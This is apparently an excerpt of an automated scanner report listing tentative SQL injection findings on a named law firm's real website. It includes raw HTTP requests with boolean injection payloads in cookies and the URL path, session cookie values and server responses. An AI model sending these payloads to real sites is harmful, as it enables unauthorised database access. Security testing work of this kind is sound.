Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flash'%20and%201%3d1--%20/perpetua.swf HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
Referer: http://www.friedfrank.com/index.cfm?pageID=42&itemID=1175
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=31349998; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.1.10.1303088795

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 06:19:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=31349998;path=/
Set-Cookie: CFTOKEN=88414738;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...
<title>Fried Frank &gt; Home</title>
<link rel="shortcut icon" type="image/ico" href="/
favicon.ico">
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/sIFR-print.css" type="text/css" media="print" />
<link href="scripts/dropdowns.css" rel="stylesheet" type="text/css" media="all" />
<script language="javascript" src="scripts/sifr.js" type="text/javascript"></script>
<!--::home::-->
<style type="text/css">
<!--
body,td,th {
   font-family: Arial, Helvetica, sans-serif;
   font-size: 12px;
   color: #333333;
}

.TempBorderBG {
   background-color:#e8f1f6;
}
.TempHeaderBG {
   background-color:#7eadbf;
}
.underNav {
   background-color:#ece6b2;
}
.searchbox {
   background-color:#E8F1F6;
   margin:0px;
   width:98px;
   height:16px;
   border:0px;
   padding:0px;
   padding-top:5px;
   font-size: 11px;
   color:#818c90;
}

-->
</style>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script src="scripts/dropdowns.js" type="text/javascript"></script>
</head>

<body>
<table border="0" cellpadding="0" cellspacing="0">
   <tr>
       <td><img src="images/px.gif" alt="" width="20" height="20" /></td>
   </tr>
</table>
<table width="760" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td colspan="3" class="TempBorderBG"><img src="images/px.gif" alt="Fried Frank" width="1" height="10" /></td>
</tr>
<tr>
<td width="10" class="TempBorderBG"><img src="images/px.gif" alt="Fried Frank" width="10" height="1" /></td>
<td width="740" class="TempHeaderBG"><table width="740" border="0" cellspacing="0" cellpadding="0">
<tr>
<td colspan="3"><img src="images/px.gif" alt="Fried Frank" width="1" height="20" /></td>
</tr>
<tr>
<td width="20"><img src="images/px.gif" alt="Fried Frank" width="20" height="20" /></td>
<td width="700">
   <table width="700" border="0" cellspacing="0" cellpadding
...[SNIP]...

Request 2

GET /flash'%20and%201%3d2--%20/perpetua.swf HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
Referer: http://www.friedfrank.com/index.cfm?pageID=42&itemID=1175
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=31349998; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.1.10.1303088795

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 06:19:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=31349998;path=/
Set-Cookie: CFTOKEN=88414738;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...
<title>Fried Frank &gt; Page Not Found</title>
<link rel="shortcut icon" type="image/ico" href="/
favicon.ico">
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/sIFR-print.css" type="text/css" media="print" />
<link href="scripts/dropdowns.css" rel="stylesheet" type="text/css" media="all" />
<script language="javascript" src="scripts/sifr.js" type="text/javascript"></script>
<!--::404::-->
<style type="text/css">
<!--
body,td,th {
   font-family: Arial, Helvetica, sans-serif;
   font-size: 12px;
   color: #333333;
}

.TempBorderBG {
   background-color:#e8f1f6;
}
.TempHeaderBG {
   background-color:#7eadbf;
}
.underNav {
   background-color:#ece6b2;
}
.searchbox {
   background-color:#E8F1F6;
   margin:0px;
   width:98px;
   height:16px;
   border:0px;
   padding:0px;
   padding-top:5px;
   font-size: 11px;
   color:#818c90;
}

-->
</style>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script src="scripts/dropdowns.js" type="text/javascript"></script>
</head>

<body>
<table border="0" cellpadding="0" cellspacing="0">
   <tr>
       <td><img src="images/px.gif" alt="" width="20" height="20" /></td>
   </tr>
</table>
<table width="760" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td colspan="3" class="TempBorderBG"><img src="images/px.gif" alt="Fried Frank" width="1" height="10" /></td>
</tr>
<tr>
<td width="10" class="TempBorderBG"><img src="images/px.gif" alt="Fried Frank" width="10" height="1" /></td>
<td width="740" class="TempHeaderBG"><table width="740" border="0" cellspacing="0" cellpadding="0">
<tr>
<td colspan="3"><img src="images/px.gif" alt="Fried Frank" width="1" height="20" /></td>
</tr>
<tr>
<td width="20"><img src="images/px.gif" alt="Fried Frank" width="20" height="20" /></td>
<td width="700">
   <table width="700" border="0" cellspacing="0" ce
...[SNIP]...

1.69. http://www.friedfrank.com/index.cfm [CFID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.friedfrank.com
Path:   /index.cfm

Issue detail

The CFID cookie appears to be vulnerable to SQL injection attacks. The payloads 73239711%20or%201%3d1--%20 and 73239711%20or%201%3d2--%20 were each submitted in the CFID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=42&itemID=729&more=1 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=3134999873239711%20or%201%3d1--%20; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.1.10.1303088795

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 21 Apr 2011 06:12:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=;expires=Wed, 21-Apr-2010 06:12:55 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=42&itemID=729&more=1 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=3134999873239711%20or%201%3d2--%20; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.1.10.1303088795

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 06:12:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=31397766;path=/
Set-Cookie: CFTOKEN=33204735;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />


<META NAME="keywords" CONTENT="">
<META NAME="description" CONTENT="&lt;STRONG&gt;Ianis Girgenson &lt;/STRONG&gt;is an antitrust and competition law associate dividing his time between Fried Frank's London and Paris offices. He joined the Firm in 2006. &lt;BR&gt;&lt;BR&gt;Mr. Girgenson has represented numerous private and listed companies, as well as financial institutions before the European Commission and national authorities in merger control proceedings and in antitrust investigations. He has also been involved in antitrust-related litigation before the EU Court of First Instance and before national courts, including the French Conseil d'Etat.&lt;BR&gt;&lt;BR&gt;Prior to joining the Firm, Mr. Girgenson practiced competition law in Paris and Brussels.">

<meta name="verify-v1" content="L9ZLHht3G4Zc0L6/Gg2wdpu3oMGZLi1MmvGFU4K2HiU=" />

<title>Fried Frank &gt; Girgenson, Ianis </title>
<link rel="shortcut icon" type="image/ico" href="/
favicon.ico">
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/sIFR-print.css" type="text/css" media="print" />
<link href="scripts/dropdowns.css" rel="stylesheet" type="text/css" media="all" />
<script language="javascript" src="scripts/sifr.js" type="text/javascript"></scr
...[SNIP]...

1.70. http://www.friedfrank.com/index.cfm [CFTOKEN cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.friedfrank.com
Path:   /index.cfm

Issue detail

The CFTOKEN cookie appears to be vulnerable to SQL injection attacks. The payloads 78527363%20or%201%3d1--%20 and 78527363%20or%201%3d2--%20 were each submitted in the CFTOKEN cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=42&itemID=729&more=1 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=31349998; CFTOKEN=8841473878527363%20or%201%3d1--%20; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.1.10.1303088795

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 21 Apr 2011 06:13:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFTOKEN=;expires=Wed, 21-Apr-2010 06:13:13 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=42&itemID=729&more=1 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=31349998; CFTOKEN=8841473878527363%20or%201%3d2--%20; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.1.10.1303088795

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 06:13:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=31397828;path=/
Set-Cookie: CFTOKEN=10675553;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />


<META NAME="keywords" CONTENT="">
<META NAME="description" CONTENT="&lt;STRONG&gt;Ianis Girgenson &lt;/STRONG&gt;is an antitrust and competition law associate dividing his time between Fried Frank's London and Paris offices. He joined the Firm in 2006. &lt;BR&gt;&lt;BR&gt;Mr. Girgenson has represented numerous private and listed companies, as well as financial institutions before the European Commission and national authorities in merger control proceedings and in antitrust investigations. He has also been involved in antitrust-related litigation before the EU Court of First Instance and before national courts, including the French Conseil d'Etat.&lt;BR&gt;&lt;BR&gt;Prior to joining the Firm, Mr. Girgenson practiced competition law in Paris and Brussels.">

<meta name="verify-v1" content="L9ZLHht3G4Zc0L6/Gg2wdpu3oMGZLi1MmvGFU4K2HiU=" />

<title>Fried Frank &gt; Girgenson, Ianis </title>
<link rel="shortcut icon" type="image/ico" href="/
favicon.ico">
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/sIFR-print.css" type="text/css" media="print" />
<link href="scripts/dropdowns.css" rel="stylesheet" type="text/css" media="all" />
<script language="javascript" src="scripts/sifr.js" type="text/javascript"></scr
...[SNIP]...

1.71. http://www.friedfrank.com/index.cfm [JSMOBILE cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.friedfrank.com
Path:   /index.cfm

Issue detail

The JSMOBILE cookie appears to be vulnerable to SQL injection attacks. The payloads 21264174%20or%201%3d1--%20 and 21264174%20or%201%3d2--%20 were each submitted in the JSMOBILE cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=42&itemID=729&more=1 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=021264174%20or%201%3d1--%20; CFID=31349998; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.1.10.1303088795

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 21 Apr 2011 06:12:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: JSMOBILE=;expires=Wed, 21-Apr-2010 06:12:37 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=42&itemID=729&more=1 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=021264174%20or%201%3d2--%20; CFID=31349998; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.1.10.1303088795

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 06:12:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=31349998;path=/
Set-Cookie: CFTOKEN=88414738;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />


<META NAME="keywords" CONTENT="">
<META NAME="description" CONTENT="&lt;STRONG&gt;Ianis Girgenson &lt;/STRONG&gt;is an antitrust and competition law associate dividing his time between Fried Frank's London and Paris offices. He joined the Firm in 2006. &lt;BR&gt;&lt;BR&gt;Mr. Girgenson has represented numerous private and listed companies, as well as financial institutions before the European Commission and national authorities in merger control proceedings and in antitrust investigations. He has also been involved in antitrust-related litigation before the EU Court of First Instance and before national courts, including the French Conseil d'Etat.&lt;BR&gt;&lt;BR&gt;Prior to joining the Firm, Mr. Girgenson practiced competition law in Paris and Brussels.">

<meta name="verify-v1" content="L9ZLHht3G4Zc0L6/Gg2wdpu3oMGZLi1MmvGFU4K2HiU=" />

<title>Fried Frank &gt; Girgenson, Ianis </title>
<link rel="shortcut icon" type="image/ico" href="/
favicon.ico">
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/sIFR-print.css" type="text/css" media="print" />
<link href="scripts/dropdowns.css" rel="stylesheet" type="text/css" media="all" />
<script language="javascript" src="scripts/sifr.js" type="text/javascript"></scr
...[SNIP]...

1.72. http://www.friedfrank.com/index.cfm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.friedfrank.com
Path:   /index.cfm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 46764192'%20or%201%3d1--%20 and 46764192'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm46764192'%20or%201%3d1--%20?pageID=2 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
Referer: http://www.friedfrank.com/index.cfm?pageID=42&itemID=729&more=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=31349998; CFTOKEN=88414738; __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.2.10.1303088795

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 06:37:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=31349998;path=/
Set-Cookie: CFTOKEN=88414738;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...
<title>Fried Frank &gt; Home</title>
<link rel="shortcut icon" type="image/ico" href="/
favicon.ico">
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/sIFR-print.css" type="text/css" media="print" />
<link href="scripts/dropdowns.css" rel="stylesheet" type="text/css" media="all" />
<script language="javascript" src="scripts/sifr.js" type="text/javascript"></script>
<!--::home::-->
<style type="text/css">
<!--
body,td,th {
   font-family: Arial, Helvetica, sans-serif;
   font-size: 12px;
   color: #333333;
}

.TempBorderBG {
   background-color:#e8f1f6;
}
.TempHeaderBG {
   background-color:#7eadbf;
}
.underNav {
   background-color:#ece6b2;
}
.searchbox {
   background-color:#E8F1F6;
   margin:0px;
   width:98px;
   height:16px;
   border:0px;
   padding:0px;
   padding-top:5px;
   font-size: 11px;
   color:#818c90;
}

-->
</style>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script src="scripts/dropdowns.js" type="text/javascript"></script>
</head>

<body>
<table border="0" cellpadding="0" cellspacing="0">
   <tr>
       <td><img src="images/px.gif" alt="" width="20" height="20" /></td>
   </tr>
</table>
<table width="760" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td colspan="3" class="TempBorderBG"><img src="images/px.gif" alt="Fried Frank" width="1" height="10" /></td>
</tr>
<tr>
<td width="10" class="TempBorderBG"><img src="images/px.gif" alt="Fried Frank" width="10" height="1" /></td>
<td width="740" class="TempHeaderBG"><table width="740" border="0" cellspacing="0" cellpadding="0">
<tr>
<td colspan="3"><img src="images/px.gif" alt="Fried Frank" width="1" height="20" /></td>
</tr>
<tr>
<td width="20"><img src="images/px.gif" alt="Fried Frank" width="20" height="20" /></td>
<td width="700">
   <table width="700" border="0" cellspacing="0" cellpadding
...[SNIP]...

Request 2

GET /index.cfm46764192'%20or%201%3d2--%20?pageID=2 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
Referer: http://www.friedfrank.com/index.cfm?pageID=42&itemID=729&more=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=31349998; CFTOKEN=88414738; __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.2.10.1303088795

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 06:37:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=31349998;path=/
Set-Cookie: CFTOKEN=88414738;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...
<title>Fried Frank &gt; Page Not Found</title>
<link rel="shortcut icon" type="image/ico" href="/
favicon.ico">
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/sIFR-print.css" type="text/css" media="print" />
<link href="scripts/dropdowns.css" rel="stylesheet" type="text/css" media="all" />
<script language="javascript" src="scripts/sifr.js" type="text/javascript"></script>
<!--::404::-->
<style type="text/css">
<!--
body,td,th {
   font-family: Arial, Helvetica, sans-serif;
   font-size: 12px;
   color: #333333;
}

.TempBorderBG {
   background-color:#e8f1f6;
}
.TempHeaderBG {
   background-color:#7eadbf;
}
.underNav {
   background-color:#ece6b2;
}
.searchbox {
   background-color:#E8F1F6;
   margin:0px;
   width:98px;
   height:16px;
   border:0px;
   padding:0px;
   padding-top:5px;
   font-size: 11px;
   color:#818c90;
}

-->
</style>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script src="scripts/dropdowns.js" type="text/javascript"></script>
</head>

<body>
<table border="0" cellpadding="0" cellspacing="0">
   <tr>
       <td><img src="images/px.gif" alt="" width="20" height="20" /></td>
   </tr>
</table>
<table width="760" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td colspan="3" class="TempBorderBG"><img src="images/px.gif" alt="Fried Frank" width="1" height="10" /></td>
</tr>
<tr>
<td width="10" class="TempBorderBG"><img src="images/px.gif" alt="Fried Frank" width="10" height="1" /></td>
<td width="740" class="TempHeaderBG"><table width="740" border="0" cellspacing="0" cellpadding="0">
<tr>
<td colspan="3"><img src="images/px.gif" alt="Fried Frank" width="1" height="20" /></td>
</tr>
<tr>
<td width="20"><img src="images/px.gif" alt="Fried Frank" width="20" height="20" /></td>
<td width="700">
   <table width="700" border="0" cellspacing="0" ce
...[SNIP]...

1.73. http://www.friedfrank.com/index.cfm [__utma cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.friedfrank.com
Path:   /index.cfm

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payloads 48537269'%20or%201%3d1--%20 and 48537269'%20or%201%3d2--%20 were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=42&itemID=729&more=1 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=31349998; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.148537269'%20or%201%3d1--%20; __utmc=113041875; __utmb=113041875.1.10.1303088795

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 21 Apr 2011 06:13:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMA=;expires=Wed, 21-Apr-2010 06:13:42 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=42&itemID=729&more=1 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=31349998; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.148537269'%20or%201%3d2--%20; __utmc=113041875; __utmb=113041875.1.10.1303088795

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 06:13:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=31349998;path=/
Set-Cookie: CFTOKEN=88414738;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />


<META NAME="keywords" CONTENT="">
